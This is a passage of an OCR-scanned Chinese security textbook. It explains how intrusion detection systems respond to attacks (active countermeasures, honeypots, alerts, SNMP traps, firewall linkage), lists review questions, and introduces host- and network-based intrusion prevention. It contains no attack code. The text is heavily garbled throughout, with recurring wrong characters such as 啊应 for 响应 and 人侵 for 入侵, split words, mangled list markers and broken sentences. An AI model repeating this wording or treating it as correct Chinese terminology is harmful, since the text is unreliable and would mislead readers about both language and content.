2 系统 目标 和 优先 权 

推动 啊 应 需求 的 兄 一 个 因 妹 是 所 监控 的 系统 功能 。 对 为 用 户 提 供 关 键 数 据 和 业务 的 
系统 ,需要 部 分 提供 主动 啊 应 机 制 ,能 终止 被 确认 为 攻击 源 的 用 户 的 网 络 连接 。 例 如 ,高 
流量 .高 交易 .高 收入 的 电子 商务 网 站 的 Web 服务 器 。 在 这 类 情况 下 ,一 次 成 功 的 拒绝 服 
务 攻 击 会 造成 灾难 性 影响 。 总 的 来 说 ,始终 保持 系统 服务 的 可 用 性 所 产生 的 价 全 远 远 超 
过 在 和 人 侵 检 测 系统 中 提供 主动 啊 应 机 制造 成 的 额外 避 用 。 


3 规则 或 法 令 的 需求 

产生 特殊 啊 应 性 能 的 另 一 些 因 和 素 可 能 是 人 侵 检测 方面 的 规章 或 法 令 的 需求 。 在 某 些 
车 事 计算 环 境 里 ,人 侵 检 测 系 统 需要 这 样 一 些 性 能 , 即 能 使 某 些 类 型 的 处 理 过 程 在 特定 情 
况 下 发 和 后。 例如 ,只 有 当 人 侵 检 测 系统 处 在 工作 的 时 候 , 一 个 系统 才 被 授权 处 理 一 定 的 敏 
感性 的 分 类 信息 。 在 这 些 环境 里 ,规则 控制 痢 人 侵 检 测 系 统 的 操作 ,事件 报告 需求 控制 着 
和信 侵 检测 系统 运行 结果 的 表达 式 和 传送 时 间 的 安排 。 如 果 入 侵 检 测 系统 不 再 运行 , 则 规 
则 指定 秘密 级 别 信 息 不 能 在 系统 上 运行 。 

在 线 股票 交易 环境 中 ,安全 和 交易 代理 要 求 系统 在 交易 期 间 对 客户 是 可 接 入 的 ,任何 
接 入 的 拒绝 将 使 站 点 但 受罚 球 或 赔偿 。 这 种 情形 既 要 有 日 动 啊 应 机 制 使 其 能 阻 窄 攻击， 
使 正常 客户 服务 工作 良好 ;又 要 对 检测 出 的 问题 作出 简单 的 解释 说 明 , 进 而 使 灾难 后 恢复 
工作 尽 可 能 地 完成 。 


4 给 用 尸 传授 专业 技术 

入 侵 检 测 产品 往往 忽略 的 一 种 需求 是 随同 检测 啊 应 或 作为 检测 啊 应 的 一 部 分 为 用 户 
提供 指导 。 也 就 是 说 ,无 论 何 时 ,只 要 可 能 ,系统 就 应 该 将 检测 结果 连同 解释 说 明和 建议 
一 起 反馈 给 用 尸 , 从 而 使 用 户 采 取 适 当 的 行动 。 在 这 方面 ,入 侵 检 测 产 品 之 间 上 共有 己 大 帮 
异 ,一 套 实际 良好 的 啊 应 机 制 能 构建 有 效 的 信息 和 解释 说 明 , 指 导 用 户 进行 一 系列 决策 ， 
采用 合适 的 命令 ,最 终 引 导 用 户 正 确 地 解决 问题 。 

这 种 啊 应 机 制 也 允许 具有 不 同 专 业 技 术 水 平 的 用 尸 对 检测 结 来 的 表现 形式 进行 加 
载 。 在 对 用 户 的 分 类 描述 时 也 应 提 到 注释 ,不 同 的 人 侵 检 测 系 统 具 有 不 同 的 信息 需求 。 
系统 管理 员 可 能 明日 网 络 服务 请 求 序 列 或 原始 数据 包 的 含义 ,安全 专家 也 许 能 理解 “端口 
扫描 ”和 “邮件 发 送 缓 冲 区 溢出 ”两 者 之 间 的 区 别 。 调 查 员 可 能 需要 这 样 一 个 功能 ; 能 追 
蹊 一 个 特别 用 户 操作 的 详细 序列 ,以 及 这 些 操作 给 系统 市 来 的 影 啊 。 

入 侵 检测 系统 开发 者 应 该 能 使 其 产品 适应 各 种 不 同 用 户 的 能 力 和 专业 技术 水 平 。 在 
这 梓 一 个 快速 成 长 的 市 场 里 ,专家 型 的 用 户 可 能 会 越 来 越 少 。 
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入 侵 检测 系统 的 啊 应 可 分 为 主动 啊 应 和 被 动 啊 应 两 种 类 型 。 在 主动 啊 应 里 ,入 侵 检 
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测 系 统 应 能 阻塞 或 影响 攻击 进而 改变 攻击 的 进程 。 在 被 动 啊 应 里 ,入 侵 检测 系统 仅 何 单 
地 报告 和 记录 所 检测 出 的 问题 。 

主动 啊 应 和 被 动 啊 应 并 不 征 互 相 排斥 的 。 不 管 使 用 哪 种 啊 应 机 制 , 作 为 任务 的 一 
重要 部 分 ,入 侵 检测 系统 应 该 怒 终 能 以 日 记 的 形式 记录 下 检测 结 来 。 

在 网 络 站 点 安全 处 理 措施 中 ,入 侵 检测 的 一 个 关键 部 分 束 是 确定 使 用 哪 种 入 侵 检 测 
啊 应 方式 以 及 根据 啊 应 结 采 决定 应 该 采取 哪 种 行动 。 


1 主动 啊 应 

主动 啊 应 注重 检测 到 入 侵 后 即 采 取 行 动 。 对 于 主动 响应 ,有 多 种 选择 方案 ,这些 方案 
绝 大 多 数 可 归于 下 列 范 畏 之 一 。 

QD 对 入 侵 者 采取 反击 行动 。 

修正 系统 环境 。 

G) 收集 尽 可 能 多 的 信息 。 

虽然 在 一 些 团体 里 ,大 多 对 入 侵 者 采取 反击 行动 ,但 它 不 是 唯一 的 主动 啊 应 。 进 一 步 讲 ， 
由 于 它 还 涉及 重要 法 规 和 现实 问题 ,所 以 这 种 啊 应 也 不 应 该 成 为 用 户 最 pei 

1) 对 入 侵 者 采取 反击 行动 

主动 啊 应 的 第 一 种 方案 是 对 人 侵 者 采取 反击 行动 ,许多 信息 仓库 管理 小 组 的 成 员 都 
认为 这 种 方法 是 最 主要 的 方式 : 首先 追踪 入 侵 者 的 攻击 来 源 , 然 后 采取 行动 切断 人 侵 者 
的 机 妖 或 网 络 的 连接 。 那 些 长 期 受到 安全 困惑 的 安全 省 理 员 往往 会 面 对 很 多 黑客 的 拒绝 
服务 式 攻击 ,因此 他 们 多 数 会 采取 该 方法 。 

对 入 侵 者 来 取 反 击 行动 也 可 以 以 温和 的 方式 进行 。 例 如 ,入 侵 检测 系统 可 以 简单 地 
通过 重新 安排 TCP 连接 终止 双方 网 络 会 话 。 系 统 也 可 以 设置 防火 墙 或 路 由 阻塞 来 日 入 
侵 来 源 的 IP 地 址 的 数据 包 。 

另 一 种 啊 应 方式 是 自动 回信 侵 者 可 能 来 日 的 系统 的 管理 员 发 E-mail ,并 且 请 求 协助 
确认 和 处 理 相 关 问 题 。 当 黑客 通过 拨号 接 人 系统 时 ,这 种 啊 应 方式 还 能 产生 多 种 用 途 。 
随 着 整个 通信 基础 设备 中 跟 踊 能 力 的 不 断 增 强 ,该 啊 应 可 以 使 用 电话 系统 的 特性 (如 呼叫 
者 标识 或 陷阱 和 跟 踊 ) 协 助 建立 人 侵 者 的 档案 。 

一 般 来 说 ,主动 来 取 反 击 行动 有 两 种 形式 : 一 种 是 由 用 户 驱 动 的 ;一 种 是 由 系统 本 号 
目 动 执行 的 。 

(1) 基于 用 户 驱 动 的 啊 应 。 

许多 主动 啊 应 性 能 来 自 超 级 安全 管理 者 无 条 理 地 执行 啊 应 的 时 候 。 虽 然 啊 应 中 的 系 
统 能 实时 地 日 动 处 理 攻击 ,但 并 不 意味 者 这 是 一 种 可 取 的 方式 。 

例如 ,假设 攻击 者 发 现 系 统 对 拒绝 服务 式 攻击 的 月 动 啊 应 是 避 开 表面 的 攻击 源 , 即 终 
止 目前 的 连接 并 拒绝 以 后 该 源 IP 地 址 的 TCP 连接 ,攻击 者 可 以 使 用 IP 地 址 欺骗 工具 对 
系统 进行 拒绝 服务 式 攻 击 ,将 攻击 伪装 成 来 日 重要 的 客户 ,从 而 导致 客户 被 拒绝 访问 关键 
资源 ,而 且 , 产 格 来 讲 是 入 侵 检 测 系 统 使 系统 拒绝 服务 。 

(2) 目 动 执行 啊 应 。 

一 方面 ,由 于 攻击 进行 的 速度 很 快 ,因此 使 一 些 基 本 的 主要 啊 应 自动 执行 是 很 有 必 
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要 的 。 绝 大 多 数 来 日 Internet 的 攻击 一 般 邦 使 用 攻击 软件 和 脚本 。 这 些 攻击 以 阻止 手工 
十 预 的 步调 进行 。 入 侵 检测 的 设计 者 们 应 该 考虑 单独 一 个 主动 啊 应 能 任用 手工 处 理 。 如 
果 干 预 必 须 自 动 进 行 , 则 应 该 采取 衡量 措施 ,以 使 主动 响应 机 制 对 付 攻击 ,使 得 带 来 的 风 


险 最 小 。 
2) 修正 系统 环境 
主动 响应 的 第 二 种 方案 是 修正 系统 环境 。 虽然 这 种 响应 没有 其 他 方法 直接 ,但 它 已 


成 为 名 用 的 最 佳 啊 应 方案 ,特别 是 与 提供 调查 文 持 的 啊 应 相 结合 的 时 候 。 修 正 系统 环境 
以 阻塞 导致 人 侵 发 生 的 漏洞 的 概念 与 许多 研究 者 提出 的 关键 系统 耦合 的 观点 是 一 致 的 。 
例如 ， 自 愈 ” 系 统 装备 着 类 似 于 人 体 免 疫 系统 的 防卫 设备 ,该 设备 能 识别 出 问题 所 在 ,能 
阳 离 产 生 问题 的 因素 ,并 处 理 该 问题 产生 一 个 适当 的 啊 应 。 

在 一 些 人 侵 检 测 系 统 中 ,这 关 啊 应 也 许 通 过 增加 敏感 水 平 改变 分 析 引 擎 的 操作 特征 。 
它 也 能 通过 规则 提高 对 茶 些 攻击 的 怀疑 水 平 或 增加 监视 范围 ,从 而 以 比 通 背 更 好 的 采样 
间 隐 收集 信息 。 这 种 策略 类 似 于 实时 过 程控 制 系 统 反 僻 机 制 , 即 目 前 系统 过 程 的 输出 将 
用 来 调整 和 优化 下 一 个 处 理 过 程 。 

3) 收集 额外 信息 

主动 啊 应 的 第 三 种 方案 是 收集 额外 信息 。 当 被 剑 护 的 系统 非常 重要 并 且 系 统 的 拥有 
者 想 进 行 法 则 矫正 时 ,这 种 方案 较为 有 效 。 有 时 ,这 种 日 记 啊 应 是 和 一 个 特殊 的 服务 右 相 
结合 配套 使 用 的 ,该 服务 用 来 癌 造 环境 使 入侵 者 能 被 转 问 。 这 种 服务 有 许多 称呼 ,最 常用 
的 是 “ 蜜 药 ”“ 计 乌 ”和 “玻璃 鱼 氏 ”。 这 些 服务 右 寂 备 看 义 件 系统 和 其 他 市 有 欺骗 性 的 系统 
属性 ,这 些 属性 就 是 被 涉及 用 来 模拟 关键 系统 的 外 在 表象 和 内 容 。 

1992 年 ,Bill Cheswick 第 一 次 探索 “ 蜜 饮 ” 服 务 右 的 具体 步骤 ,一 个 攻击 Cheswick 系 


统 的 荷兰 黑客 就 是 被 重 定向 进入 该 服务 器 的 。Cliff Stoll 在 他 的 经 典 著作 里 报道 过 “ 密 
负 ” 服 务 器 的 使 用 情况 。 


“ 窄 具 ”服务 涡 对 正 收集 入 侵 者 的 威胁 信息 或 收集 对 入 侵 者 采取 法 律 行动 的 证 据 的 安 
全 省 理 者 来 说 是 很 有 价值 的 。 使 用 “和 鹤 多 ”服务 各 使 入 侵 的 受害 者 在 实际 系统 的 内 容 没 有 
毁坏 或 又 露 风险 的 情况 下 可 以 确定 入 侵 痢 的 意图 .记录 下 入 侵 痢 入 侵 行 为 的 视 外 信息 。 
这 些 信息 也 能 用 来 构造 用 户 检 测 信 和 号。 

以 这 种 方式 收集 的 信息 对 从 事 网 络 安全 威胁 趋 努 分 析 员 来 说 很 有 价值 。 这 种 信息 对 
必须 在 有 政 意 威胁 的 环境 里 运行 或 遭受 大 量 攻 击 的 系统 特别 重要 。 


2 被 动 啊 应 
被 动 啊 应 就 是 只 回 用 户 提供 信息 而 依 徘 用 户 杀 取 下 一 步行 动 的 啊 应 。 这 种 弹性 设置 
允许 用 户 裁 芳 告 汉 , 以 适合 本 组 织 的 系统 操作 程序 规范 。 在 早期 的 入侵 检测 系统 中 ,所 有 
的 啊 应 虱 是 被 动 的 。 被动 啊 应 也 很 重要 ,在 一 些 情 形 下 是 系统 唯一 的 啊 应 形式 。 这 里 根 
据 人 危险 程度 的 大 小 排序 列 出 各 种 被 动 啊 应 ,在 索 告 机 制 和 问题 报告 之 间 , 人 危险 程度 完全 不 
= 
1) 告警 和 通知 
绝 大 多 数 人 侵 检 测 系 统 都 提供 多 种 形式 的 各 警 生成 方式 供 选择 。 
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(1) 告 壹 显示 屏 。 

入 侵 检测 系统 提供 的 最 篆 用 的 告警 和 通知 方式 是 屏幕 告警 或 窗口 告警 消息 出 现在 人 
侵 检 测 系 统 控 制 台 上 ,或 出 现在 人 侵 检 测 系 统 安 装 时 由 用 户 配 置 的 其 他 系统 。 在 告警 消 
县 方面 ,不 同 的 系统 提供 的 信息 翔实 程度 不 同 , 范 围 从 一 个 简单 的 “一 个 人 侵 已 经 发 生 ? 到 
列 出 此 时 问题 的 表面 源头 、 攻 击 的 目标 ,人 侵 的 本 质 以 及 攻击 是 否 成 功 等 广泛 性 记录 。 在 
一 些 系统 里 ,告警 消息 的 内 容 也 可 以 由 用 户 和 定制。 

(2) 告警 和 和 守 报 的 远程 通知 。 

按时 钟 协 调运 行 多 系统 的 组 织 使 用 另 一 种 告警 .警报 形式 。 在 这 些 情形 下 ,人 侵 检 测 
系统 能 通过 拨号 寻 呼 或 移动 电话 问 系 统管 理 员 和 安全 工作 人 员 发 出 告警 和 警报 消息 。E- 
mail 消息 是 男 一 种 通知 手段 ,这 种 方法 在 攻击 连续 不 断 或 持久 的 情况 下 不 建议 使 用 , 因 
为 攻击 者 可 能 会 读 取 E-mail 消息 ,并 且 可 能 会 阻塞 E-mail 消息 。 在 一 些 情形 下 ,通知 选 
项 允许 用 户 给 相应 单位 配置 附加 信息 或 告警 编码 。 

2) SNMP Trap 和 插件 

一 些 人 侵 检 测 系 统 被 设计 成 与 网 络 管理 工具 一 起 使 用 。 这 些 系统 网 络 管理 能 使 用 基 
础 设施 传送 告警 ,并 可 在 网 络 管理 控制 台 显 示 告 警 和 警报 信息 。 一 些 产品 就 依附 简单 网 
络 管理 协议 的 消 县 或 SNMP Trap 作为 一 个 告警 选项 。 

入 侵 检 测 系统 和 网 络 管理 的 集成 能 够 带 来 许多 好 处 ,包括 使 用 常用 通信 的 能 力 ,以 及 
在 考虑 网 络 环境 时 对 安全 问题 提供 主动 啊 应 的 能 力 。 


293 联动 啊 应 机 制 


入 侵 检 测 的 主要 作用 是 通过 检查 主机 日 志 或 网 络 传输 内 容 ,发 现 潜在 的 网 络 攻击 ,但 
一 般 的 入 侵 检测 系统 只 能 做 简单 的 啊 应 ,如 通过 发 RST 包 终止 可 疑 的 TCP 连接。 因此 ， 
在 啊 应 机 制 中 ,需要 发 挥 各 种 不 同 网 络 安 全 技术 的 特点 ,从 而 取得 更 好 的 网 络 安全 防范 效 
打 。 于 征 , 入 侵 检测 系统 的 联动 啊 应 机 制 应运 而 生 。 

目前 ,可 以 与 入侵 检测 系统 联动 进行 啊 应 的 安全 技术 包括 防火 二、 安全 扫 摘 洛 、 防 病 
全 系统 ,安全 加 密 系 统 等 。 其 中 最 主要 的 是 防火 墙 联 动 , 即 当 入 侵 检 测 系 统 检测 到 洪 在 的 
网 络 攻击 后 ,将 相关 信息 传输 给 防火 墙 ,由 防火 墙 采 取 相 应 拱 施 ,从 而 更 有 效 地 你 护 网 络 
信息 系统 的 安全 。 

基本 的 人 侵 检 测 联动 啊 应 框架 如 图 2-13 所 示 。 从 图 2-13 中 可 以 看 出 ,联动 的 基本 
过 程 是 “ 报 置 -转换 - 啊 应 ”。 入 侵 检 测 系统 时 刻 检测 网 络 的 动态 信息 ,一 旦 发 现 异 第 情况 
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2-13 ”基本 的 人 侵 检 测 联 动 咽 应 框 染 
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或 攻击 行为 , 束 会 通过 联动 控制 台 , 由 联动 控制 台 对 报 填 信息 进行 分 析 人 处理 后 ,根据 网 络 
安全 配置 .具体 的 产品 类 型 ,向 防火 墙 或 其 他 安全 产品 发 出 啊 应 命令 ,在 攻击 企图 未 达到 
目的 前 做 出 正确 咽 应 ,阻止 非法 入 侵 行为 。 这 样 ,入 侵 检 测 系 统 将 日 映 的 发 现 能 力 和 其 他 
安全 产品 的 啊 应 能 力 缩 合 起 来 使 用 ,有 效 地 所 局 了 网 络 安全 水 平 。 

从 联动 的 角度 出 发 ,安全 设备 可 以 分 为 两 大 类 : 具有 发 现 能 力 的 设备 和 具有 啊 应 能 
力 的 设备 。 前 者 如 入 侵 检 测 系统 , 它 可 以 从 网 络 中 的 硅 干 关键 点 收集 信息 ,并 对 其 进行 分 
术 , 从 而 检测 网 络 流量 中 违反 安全 条 略 的 行为 。 后 者 如 防火 墙 , 它 所 供 的 是 大 态 防御 , 通 
过 事先 设置 规则 ,防范 可 能 的 攻击 。 有 具有 发 现 能 力 的 产品 ,如 入 侵 检 测 系 统 , 一 般 是 通过 
报 堵 通 知 管理 人 员 , 它 产 生 的 事件 称 为 啊 应 事件 。 因 此 ,在 联动 啊 应 系统 中 要 对 报 置 事件 
进行 分 类 ,并 将 报 置 事件 分 类 和 结 来 与 啊 应 事件 关联 起 来 ,这 样 才能 进行 报 置 与 啊 应 的 
联动 。 

通过 入侵 检测 系统 的 联动 咽 应 机 制 ,可 以 发 挥 其 他 网 络 安全 产品 的 优 努 ,使 入 侵 检 测 
系统 和 其 他 安全 产品 协同 工作 ,大 大 提高 网 络 信息 系统 的 整体 防卫 能 力 。 


210 思考 题 


. 人 侵 检 测 分 析 的 目的 是 什么 ? 

. 按 数据 源 对 入 侵 检测 进行 分 类 ,可 分 为 哪 几 类 ? 

. 集中 式 入 侵 检测 系统 和 分 布 式 入 侵 检测 系统 的 区 别 是 什么 ? 
. 通用 入 侵 检 测 系 统 模型 包括 哪些 主要 组 成 部 分 ? 

. 层次 化 的 入侵 检测 模型 将 入 侵 检测 系统 分 为 哪 几 个 层次 ? 
. 层次 化 和 人 侵 检 测 模型 的 优点 有 哪些 ? 

. 什么 是 管理 式 人 侵 检 测 模型 ? 

. 人 侵 检测 系统 包括 哪些 基本 结构 单元 ? 

. 人 人 侵 检测 过 程 可 以 分 为 哪 几 个 阶段 ? 

10. 协议 分 析 技 术 可 以 解决 哪些 问题 ? 

11. 入 侵 分 析 需 要 考虑 哪些 因素 ? 

12. 入侵 分 析 过 程 分 为 哪儿 个 阶段 ? 

13. 告警 与 啊 应 的 作用 是 什么 ? 

14. 常见 的 告 苟 与 啊 应 方式 有 哪些 ? 

15. 联动 啊 应 机 制 的 含义 是 什么 ? 
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3 1 入 侵 防 御 的 基本 概念 


311 入 侵 防 御 的 定义 


和 人 入侵 防御 系统 (Intrusion Prevention System,IPS) 是 指 能 够 检测 到 攻击 行为 (包括 已 
知 攻击 和 未 知 攻击 ) ,并 能 够 有 效 阻 断 攻 击 的 硬件 和 软件 系统 。 入 侵 防 御 系 统 在 线 检测 网 
络 和 主机 ,发 现 攻击 后 能 实施 有 效 的 阻 断 , 防 止 攻击 到 达 目 标 网 络 或 主机 。 从 技术 上 来 
说 ,入 侵 防 御 系 统 吸 取 并 融合 了 防火 墙 和 入 侵 检 测 搁 术 , 目 的 是 为 网 络 提供 深层 次 的 、 有 
效 的 安全 防护 。 

IPS 撤 术 可 以 深度 感知 并 检测 流 经 的 数据 流量 ,对 恶意 报 文 进行 丢 径 以 阻 断 攻击 ,对 
滥用 报 文 进行 限 流 以 保护 网 络 审 宽 殴 源 。 对 于 部 署 在 数据 转发 路 径 上 的 IPS, 可 以 根据 
预先 设 定 的 安全 案 略 ,对流 经 的 每 份 报 文 进行 诛 度 检测 (如 协议 分 析 跟 足 .特征 匹配 .流量 
统计 分 机 .事件 关联 分 析 等 ) ,一 旦 发 现 隐 焉 其 中 的 网 络 攻击 ,可 以 根据 该 攻击 的 威胁 级 别 
立即 采取 抵御 措施 ,这 些 措施 包括 (按照 处 理 力度 ) 回 管理 中 心 告 警 、 于 径 该 报 文 . 切 断 此 
次 应 用 会 话 .切断 此 次 TCP 连接 。 


312 入 侵 防御 的 分 类 


人 入侵 防御 系统 通常 可 分 为 3 种 ; 基于 主机 的 入 侵 防 御 系 统 (Host-based IPS,HIPS)、 
基于 网 络 的 人 侵 防 御 系 统 (Network-based IPS,NIPS) 和 应 用 入 侵 防 御 系 统 (Application 
IPS, AIPS). 


1 基于 主机 的 入 侵 防 御 系 统 

HIPS 是 卫 接 安 农 在 受 保护 机 各 上 的 代理 程序 ,检测 并 ET 

与 操作 系统 内 核 紧 密 捆绑 在 一 起 ,监视 和 和 镭 听 内 核 系 统 调用 ,阻挡 攻击 ,并 记录 日 读 
同时， 它 还 监视 时 对 条 一 特殊 应 用 的 数据 流 和 环境 变化 ， 服务 器 的 文件 位 置 及 系统 本 和 
文件 的 变化 ,你 护 应 用 程序 免 受 目前 系统 特征 库 中 还 没有 特征 记录 的 攻击 。 进 出 这 个 特 
珠 系统 的 通信 和 应 用 程序 .操作 系统 的 行为 将 被 监视 和 检查 ,判断 其 是 否 存在 攻击 迹象 ， 

HIPS 不 仅 可 以 你 护 操 作 系统 ,还 可 以 你 护 在 其 上 运行 的 应 用 程序 ,如 服务 化 等 。 妆 
检测 到 攻击 时 ,HIPS 会 在 网 络 接口 技 阻 断 攻 击 , 或 者 站 操作 系统 发 出 指令 ,人 条 死 攻击 进 
程 ,停止 进行 的 攻击 行为 。 例 如 ,通过 禁止 悉 意 程序 的 执行 ,可 以 防止 缓冲 区 溢出 攻击 
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(Buffer Overflow Attack) ,这 些 程序 被 攻击 者 植 和 人 到 被 侵入 (Exploited) 的 地 址 空间 。 通 
过 拦截 和 拒绝 IE 发 出 的 写 文件 (Worite File) 命 令 , 可 以 阻挡 攻击 者 试图 通过 像 IE 这 样 的 
应 用 程序 安 闪 后门 程序 (Back Door)。 

因为 HIPS 监听 所 有 到 受 保护 主机 的 请 求 ,所 以 必需 的 前 提 是 不 能 影 啊 系统 的 性 能 ， 
并 且 不 会 阻挡 正常 合法 的 通信 。 如 采 不 能 满足 这 些 需 求 , 不 管 它 如 何 有 效 阻 挡 攻 击 ,都 不 
能 部 署 在 主机 上 。 

HIPS 通过 在 主机 服务 带 上 安 汤 软件 代理 程序 ,防止 网 络 攻 击 入 侵 操 作 系 统 以 及 应 
用 程序 。 基 于 主机 的 入 侵 防 御 能 够 保证 服务 人 适 的 安全 昼 点 不 被 不 法 分 子 利用 。 琳 安信 公 
司 的 Malware Defender、Cisco 公司 的 Okena、NAI 公 司 的 McAfee Entercept 都 属于 这 类 
产品 ,它们 在 防范 红色 代码 和 Nimda 的 攻击 中 起 到 了 很 好 的 防护 作用 。 基 于 主机 的 入 侵 
防护 技术 可 以 根据 日 定 义 的 安全 苹 略 以 及 分 析 学 习 机 制 阻 断 对 服务 带 \、 主 机 发 起 的 恶意 
入 侵 。HIPS 可 以 阻 断 缓冲 区 溢出 改变 登录 口令 改写 动态 链接 库 以 及 其 他 试图 从 操作 
系统 夺取 控制 权 的 入 侵 行为 ,整体 提升 主机 的 安全 水 平 。 

在 技术 上 ,HIPS 采用 独特 的 服务 天 你 护 途 径 , 利 用 由 包 过 小 .状态 检测 和 实时 人 侵 
检测 组 成 的 分 层 防护 体系 。 这 种 体系 能 够 在 提供 合理 吞吐 率 的 前 提 下 ,最 大 限度 地 保护 
服务 带 的 敏感 内 容 , 既 可 以 以 软件 形式 散 入 到 应 用 程序 对 操作 系统 的 调用 中 ,通过 拦截 针 
对 操作 系统 的 可 疑 调用 ,提供 对 主机 的 安全 防护 ,也 可 以 以 更 改 操 作 系 统 内 核 程 序 的 方 
式 ,提供 比 操作 系统 更 加 严谨 的 安全 控制 机 制 。 

由 于 HIPS 工作 在 受 保护 的 主机 服务 右上 , 它 不 但 能 够 利用 特征 和 行为 规则 检测 , 阻 
止 请 如 缓冲 区 洲 出 之 类 的 已 知 攻 击 , 还 能 防 汇 未 知 攻 击 , 防 止 针 对 页 面 \ 应 用 和 资源 的 未 
授权 的 非法 访问 。HIPS 与 具体 的 主机 服务 右 操 作 系 统 平台 紧密 相关 ,不 同 的 平台 需要 
不 同 的 软件 代理 程序 。 

HIPS 具有 如 下 优点 。 

(1) 软件 百 接 安 疤 在 系统 上 ,可 以 你 护 系统 免 受 攻击 ,如 阻 断 程序 写 文 件 . 阻 止 用 户 
权限 的 升级 等 。 

(2) 当 移 动 系统 接 人 受 剑 护 网 络 时 ,保护 特定 主机 钢 有 党 攻击 。 电 虫 病 毒 主 要 是 无 线 
上 网 的 笔记 本 式 计算 机 市 入 受 保护 网 络 的 。 

(3) 保护 系统 免 受 本 地 攻击 。 能 够 物理 (直接 ) 访 问 系统 的 人 ,可 以 通过 执行 优盘 、 或 
本 地 的 程序 发 动 本 地 攻击 。 这 些 攻击 通常 是 为 了 把 用 户 权限 提升 到 超级 用 户 (Root) 或 
管理 员 (Administrator) 权 限 ,以 攻击 网 络 中 的 其 他 系统 。 

(4) 提供 最 后 一 道 防线 , 免 受 其 他 安全 工具 检测 的 攻击 。 安 装 在 目标 受害 者 系统 上 


的 HIPS 是 安全 人 员 防 止 系统 受 危 及 的 最 后 一 个 防御 点 。 
(5) 防止 相同 网 段 上 的 系统 、 设 备 受 到 内 部 攻击 或 滥用 ,NIPS 只 能 保护 在 不 同 网 段 
间 移 动 的 数据 ,在 同 网 段 、 系 统 间 发 动 的 攻击 只 能 外 Q HIPS 检测 到 。 


(6) 保护 系统 免 受 已 加 密 的 攻击 , 受 保护 系统 正 是 加 密 数 据 流 的 终点 。HIPS 等 加 密 
的 数据 在 本 机 解密 后 ,检查 数据 及 其 行为 ,或 系统 的 活动 。 
(7) HIPS 独立 于 网 络 体系 结构 ,允许 需要 保护 的 系统 位 于 任何 网 络 体系 中 ,包括 过 
时 的 或 不 常用 的 网 络 体系 ,如 令 牌 环 网 (Token Ring) 、FDDI 等 。 
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2 基于 网 络 的 入 侵 防 御 系 统 

网 络 入 侵 防 御 系 统 (NIPS) 与 受 保护 网 段 是 串联 部 署 的 。 受 保护 的 网 段 与 其 他 网 络 
之 间 交 互 的 数据 流 都 必须 通过 NIPS 设备 。 当 数据 包 通 过 NIPS 时 ,通信 将 被 监视 是 否 存 
在 攻击 。 攻 击 的 误 报 将 导致 合法 的 通信 被 阻 断 , 也 就 是 可 能 出 现 拒绝 服务 (DoS) 的 情况 ， 
因此 , 极 高 的 精确 性 和 高 级 别 的 性 能 对 NIPS 至 关 重 要 。 高 性 能 是 合法 通信 通过 NIPS 时 
不 会 延迟 的 保障 。 当 检测 到 攻击 时 ,NIPS 丢弃 或 阻 断 含有 攻击 的 数据 ,进而 阻 断 攻 击 。 

NIPS 兼 有 防火 场 和 反 病 毒 等 安全 组 件 的 特性 ,有 时 也 被 称 为 内 般 式 IDS 或 网 关 式 
IDS。NIPS 串联 在 网 络 的 主干 线 上 ,至 少 需要 两 块 网 卡 : 一 块 连接 内 部 网 络 ; 另 一 块 连接 
外 部 网 络 ,所 有 进出 的 数据 包 都 要 通过 它 。 当 数据 包 经 过 任何 一 块 网 卡 时 ,NIPS 将 把 它 
们 传递 到 检测 引擎 。 在 这 一 点 上 ,IPS 的 检测 引 警 同 任何 IDS 一 样 ,将 确定 此 包 是 否 包 含 
威胁 网 络 安全 的 特征 。 但 是 ,与 其 他 IDS 不 同 的 是 , 当 检 测 到 一 个 恶意 的 数据 包 时 ,IPS 
不 但 发 出 警报 ,还 会 月 动 采 取 相 应 的 措施 ,以 最 大 可 能 地 终止 恶意 和 人 侵 。 

在 技术 上 ,NIPS 吸取 了 目前 NIDS 所 有 的 成 熟 技术 ,包括 特征 匹配 、 协 议 分 析 和 异常 
检测 。 特 征 匹配 是 应 用 最 广泛 的 技术 ,具有 准确 率 高 .速度 快 的 特点 。 基 于 状态 的 特征 匹 
配 不 但 检测 攻击 行为 的 特征 ,还 要 检查 当前 网 络 的 会 话 状 态 ,避免 受到 欺骗 攻击 。 

协议 分 析 是 一 种 较 新 的 入 侵 检 测 拉 术 , 它 充分 利用 网 络 协议 的 高 度 有 序 性 ,并 结合 局 
速 数据 包 捕 捉 和 协议 分 析 ,快速 检测 某 种 攻击 特征 。 协 议 分 析 正 在 未 渐 进入 成 熟 应 用 阶 
段 。 协 议 分 析 能 够 理解 不 同 协 议 的 工作 原理 ,以 此 分 析 这 些 协 议 的 数据 包 , 寻 找 可 疑 或 不 
正常 的 访问 行为 。 协 议 分 析 不 仅 基 于 协议 标准 (如 RFC) ,还 基于 协议 的 具体 实现 ,这 是 
因为 很 多 协议 的 实现 偏离 了 协议 标准 。 通 过 协议 分 析 ,NIPS 能 够 对 插入 (Insertion) 与 规 
避 (Evasion) 攻 击 进行 检测 。 异 常 检测 的 误 报 率 比 较 高 ,NIPS 不 将 其 作为 主要 技术 。 

总 的 来 说 ,NIPS 具有 如 下 优点 。 

(1) 单个 通信 (流量 ) 控 制 点 可 以 保护 许多 位 于 NIPS 之 下 的 系统 。 这 梓 ,组 织 .企业 
就 可 以 很 快 改变 网 络 的 规模 ,并 且 更 加 灵活 地 改变 网 络 的 体系 结构 。 

(2) NIPS 设备 像 单个 探测 需 (Sensor) 一 样 易 于 部 署 , 可 以 保护 成 百 上 千 的 系统 。 部 
署 几 个 或 几 十 个 探测 奉 比 在 成 百 上 千 的 系统 上 安 妆 软件 省 去 许多 的 时 间 和 精力 。 

(3) 提供 一 个 更 宽 的 视野 ,可 以 发 现 威胁 情形 ,如 扫描 、 探 测 .攻击 基于 非 单一 系统 的 
设备 。 通 过 工作 在 网 络 层 ,NIPS 比 HIPS 具有 更 宽 的 发 现 威胁 的 视野 。 有 了 这 个 全 局 的 
战略 性 高 度 ,更 容易 发 现 威 胁 环境 ,更 容易 采用 安全 管理 ,主动 保护 实时 变化 的 网 络 环境 ，。 

(4) 保护 非 计 算 机 类 的 网 络 设 备 。 并 非 所 有 的 攻击 都 是 针对 受 HIPS 保护 的 .运行 
操作 系统 的 计算 机 。 例 如 ,路 由 器 .防火 墙 \VPN 网 关 、 打 印 机 等 ,都 是 易 受 到 攻击 的 , 需 
要 受到 保护 。 

(5) 与 平台 无 关 。HIPS 对 于 所 有 网 络 中 的 系统 不 一 定 都 适用 ,如 保护 不 常用 的 操作 
系统 或 应 用 程序 。 而 NIPS 不 一 样 , 它 可 以 保护 所 有 设备 ,无 论 是 操作 系统 ,还 是 应 用 
